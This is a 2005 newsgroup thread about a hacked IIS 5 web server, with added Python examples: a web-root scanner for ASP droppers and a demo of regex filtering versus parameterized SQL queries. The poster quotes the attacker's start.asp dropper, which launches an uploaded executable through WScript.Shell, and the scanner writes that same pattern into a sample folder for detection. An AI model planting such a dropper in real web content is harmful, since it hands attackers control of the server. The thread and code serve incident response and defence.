IIS 5 Compromisation
Saturday Night Paulsy 2005-04-06, 7:53 am
Hi all,
my company has several servers acting as web servers hosted at an ISP and
one of them was compromised by some warez bunnies.
All the servers have the latest patches and anti-virus software running, but
no firewall...
Several files appeared in a folder off one of the webs, being
kill.exe
shellconfig.ocx
shellsuccesslog.ocx
win.asp
start.asp
shellhost32.exe
win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
start.asp reads as follows
<%
CreateObject("WScript.Shell").Run("shellhost32.exe")
%>
<h1>Yes, you made it!! Good job dude!<\h1>
My question is, has anyone encountered this and how do they get the files
there. Two questions, really.
Any help would be greatly appreciated, as they uploaded a significant amount
of German DVDs and other garbage onto the server at our expense.
Regards,
Paul Korosi
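The dropper quoted above is a server-side script that creates WScript.Shell and runs an executable placed next to it. The following scanner is an added example (not from the original thread) that walks an IIS web root, flags ASP files with that pattern and flags executables or COM files sitting in web content folders; the sample folder it scans is constructed from the file names in the post, with a harmless placeholder in place of the real shellhost32.exe.

```python
import os
import re
import tempfile

# Signature of the dropper quoted in the post: CreateObject("WScript.Shell") followed
# by a .Run( call inside a server-side script. Both must match to reduce noise.
SHELL_PATTERN = re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)
RUN_PATTERN = re.compile(r'\.Run\s*\(', re.IGNORECASE)
SCRIPT_EXT = {".asp", ".asa", ".inc"}
BINARY_EXT = {".exe", ".ocx", ".dll", ".com", ".bat", ".cmd", ".vbs"}

def scan_webroot(root):
    """Walk a web root and return a sorted list of (relative path, reason) findings."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if ext in BINARY_EXT:
                findings.append((rel, "executable/COM file in web content folder"))
            elif ext in SCRIPT_EXT:
                try:
                    with open(path, "r", encoding="utf-8", errors="replace") as fh:
                        text = fh.read()
                except OSError:
                    continue
                if SHELL_PATTERN.search(text) and RUN_PATTERN.search(text):
                    findings.append((rel, "server-side script launches a process via WScript.Shell"))
    return sorted(findings)

def build_sample_webroot():
    """Constructed sample folder mirroring the post; the .exe is a placeholder, not malware."""
    root = tempfile.mkdtemp(prefix="iis_scan_")
    folder = os.path.join(root, "pub")
    os.makedirs(folder)
    with open(os.path.join(folder, "start.asp"), "w") as fh:
        fh.write('<%\nCreateObject("WScript.Shell").Run("shellhost32.exe")\n%>\n')
    with open(os.path.join(folder, "shellhost32.exe"), "wb") as fh:
        fh.write(b"MZ placeholder - constructed, not a real binary")
    with open(os.path.join(folder, "index.asp"), "w") as fh:  # benign page, must not be flagged
        fh.write('<% Response.Write("hello") %>\n')
    return root

if __name__ == "__main__":
    for rel, reason in scan_webroot(build_sample_webroot()):
        print(f"{rel}: {reason}")
```

Run it against the real web roots (and writable FTP folders) rather than the sample; any hit on a file you did not deploy is a reason to preserve the box for forensics before rebuilding it.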
Jeff Cochran 2005-04-06, 5:57 pm
On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
<pkorosi@redpepper.com.au> wrote:
>Hi all,
>
>my company has several servers acting as web servers hosted at an ISP and
>one of them was compromised by some warez bunnies.
>All the servers have the latest patches and anti-virus software running, but
>no firewall...
>
>Several files appeared in a folder off one of the webs, being
>
>kill.exe
>shellconfig.ocx
>shellsuccesslog.ocx
>win.asp
>start.asp
>shellhost32.exe
>
>
>win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
>start.asp reads as follows
>
><%
>CreateObject("WScript.Shell").Run("shellhost32.exe")
>%>
><h1>Yes, you made it!! Good job dude!<\h1>
>
>
>My question is, has anyone encountered this and how do they get the files
>there. Two questions, really.
To find out how they got there, check your audit logs and firewall
logs. Oh yeah, you already figured out that they got there because
you weren't secured and had no firewall. Likely you weren't auditing
either. Possibly hadn't turned off anonymous file upload in FTP.
Possibly your host got hacked. Possibly a SQL attack. Possibly using
"password" as a password wasn't that smart. Too many possiblys for
anyone to tell you for sure.
>Any help would be greatly appreciated, as they uploaded a significant amount
>of german dvd's and other garbage onto the server at our expense.
Bummer. Flatten the box, reinstall from scratch, patch, secure and
get that firewall installed. Live and learn.
Jeff
Saturday Night Paulsy 2005-04-06, 8:48 pm
ha ha - nice one Jeff,
I might be dumb but I aint that stupit. I admit I am no security
specialist - I'm a programmer. I thought someone here
might be able to shed some light, judging by the responses to the questions
in this group, some of which quite frankly
don't even belong in this group.
As for your suggestions, administrator only ftp access, 13 character strong
password - it would even take YOU a
century to work it out. All database submissions/requests are filtered
against SQL injection attacks using regex. I simply
can't see any way in via that side.
Anyways - it turns out it's the Win32.IRCFlood trojan, and appears to be
fairly new as the only patch available to deal with it
is dated yesterday. And, as my MSCE friend has just told me (after some
research), firewalls won't necessarily stop it from getting on
the box - only stop the gigs of shite from getting put on.
For anyone that might be interested, it was probably downloaded by someone
doing "legit" work on the box by browsing. That's what
the msce told me, anyways - and he's a good deal brighter than your average
minesweeper certified solitaire expert.
Finally, thanks for your help. Next time I reckon I'll just fart 'cause
it'll save all this typing time. I could've been drinking coffee instead.
"Jeff Cochran" <jeff.nospam@zina.com> wrote in message
news:42616af5.1154390806@msnews.microsoft.com...
> On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
> <pkorosi@redpepper.com.au> wrote:
>
> To find out how they got there, check your audit logs and firewall
> logs. Oh yeah, you already figured out that they got there because
> you weren't secured and had no firewall. Likely you weren't auditing
> either. Possibly hadn't turned off anonymous file upload in FTP.
> Possibly your host got hacked. Possibly a SQL attack. Possibly using
> "password" as a password wasn't that smart. Too many possiblys for
> anyone to tell you for sure.
>
> Bummer. Flatten the box, resinstall from scratch, patch, secure and
> get that firewall installed. Live and learn.
>
> Jeff
Jeff Cochran 2005-04-08, 5:51 pm
On Thu, 7 Apr 2005 11:36:15 +1000, "Saturday Night Paulsy"
<pkorosi@redpepper.com.au> wrote:
>ha ha - nice one Jeff,
>
>I might be dumb but I aint that stupit. I admit I am no security
>specialist - I'm a programmer. I thought someone here
>might be able to shed some light, judging by the responses to the questions
>in this group, some of which quite frankly
>don't even belong in this group.
>
>As for your suggestions, administrator only ftp access, 13 character strong
>password - it would even take YOU a
>century to work it out.
A 13 character string, assuming you didn't use high-ASCII characters
since they're awfully hard to type in a password, is about 22 minutes
to crack. Less if I can use an exploit to get the SAM database on an
unpatched system. Is FTP set to lock out the user after x number of
failed attempts?
>All database submissions/requests are filtered
>against SQL injection attacks using regex. I simply
>can't see any way in via that side.
It's the ways you can't see that come back to bite you. Are you using
a standard port for SQL? Is *every* query parameterized and using
stored procedures?
>Anyways - it turns out its the Win32.IRCFlood trojan, and appears to be
>fairly new as the only patch available to deal with it
>is dated yesterday.
The Win32.IRCFlood!Trojan is several years old, and the major AV
vendors have detected it for quite a while. This may be a newer
variant, but even those should be detected. The older version used
IRC ports for control, which would normally be blocked by a firewall
on a system that didn't have IRC clients/servers running.
The major problem you have now though is that this trojan allows
control of the system through a backdoor it installs. You may have
found and removed the trojan, but do you know what other changes have
been made to the system? Possibly none, but you don't have the
logging in place to do the forensics to be sure.
The advice still stands. Flatten the box and reinstall.
>And, as my MSCE friend has just told me (after some
>research), firewalls won't necessarily stop it from getting on
>the box - only stop the gigs of shite from getting put on.
>
>For anyone that might be interested, it was probably downloaded by someone
>doing "legit" work on the box by browsing. thats what
>the msce told me, anyways - and he's a good deal brighter than your average
>minesweeper certified solitaire expert.
The trojan in question is normally delivered via an executable, which
when run installs the trojan and opens the backdoors. I haven't seen
any newer attack vectors for it, but then I haven't looked either. A
new variant may have a new vector. Or something else you haven't
detected may be on the box as well.
>Finally, thanks for your help. Next time I reckon I'll just fart 'cause
>it'll save all this typing time. I could've been drinking coffee instead.
Next time, go ahead and fart *and* save the typing time. But install
and correctly configure a firewall. Configure auditing. Install and
use the latest version of your AV software. Security isn't a singular
event, it's an ongoing process. Fortunately, you can still drink your
coffee while monitoring it.
Jeff
>"Jeff Cochran" <jeff.nospam@zina.com> wrote in message
>news:42616af5.1154390806@msnews.microsoft.com...
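Jeff's point that regex filtering is not a substitute for parameterized queries, as an added example (not from the original thread; the table and names are constructed). The blacklist version rejects a legitimate name containing an apostrophe and still builds SQL by concatenation; the parameterized version passes the value to the driver separately from the SQL text, so a quote in the value is data, never syntax.

```python
import re
import sqlite3

# A blacklist regex of the kind the poster describes: it rejects anything that looks
# like SQL syntax, which also throws away valid input such as names with apostrophes.
BLACKLIST = re.compile(r"['\";]|--|\b(or|and|union|select|drop)\b", re.IGNORECASE)

def regex_filtered_lookup(conn, customer_name):
    """Blacklist approach: refuse input the regex dislikes, then concatenate into SQL."""
    if BLACKLIST.search(customer_name):
        return None  # a legitimate name such as O'Brien is rejected here
    cur = conn.execute("SELECT id FROM customers WHERE name = '" + customer_name + "'")
    row = cur.fetchone()
    return row[0] if row else None

def parameterized_lookup(conn, customer_name):
    """Parameterized query: the SQL text is fixed and the value is bound by the driver."""
    cur = conn.execute("SELECT id FROM customers WHERE name = ?", (customer_name,))
    row = cur.fetchone()
    return row[0] if row else None

def build_sample_db():
    """Constructed in-memory customers table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO customers (name) VALUES (?)",
                     [("Alice Smith",), ("Sarah O'Brien",)])
    conn.commit()
    return conn

if __name__ == "__main__":
    db = build_sample_db()
    print("regex filter  :", regex_filtered_lookup(db, "Sarah O'Brien"))   # None, rejected
    print("parameterized :", parameterized_lookup(db, "Sarah O'Brien"))    # 2, found
```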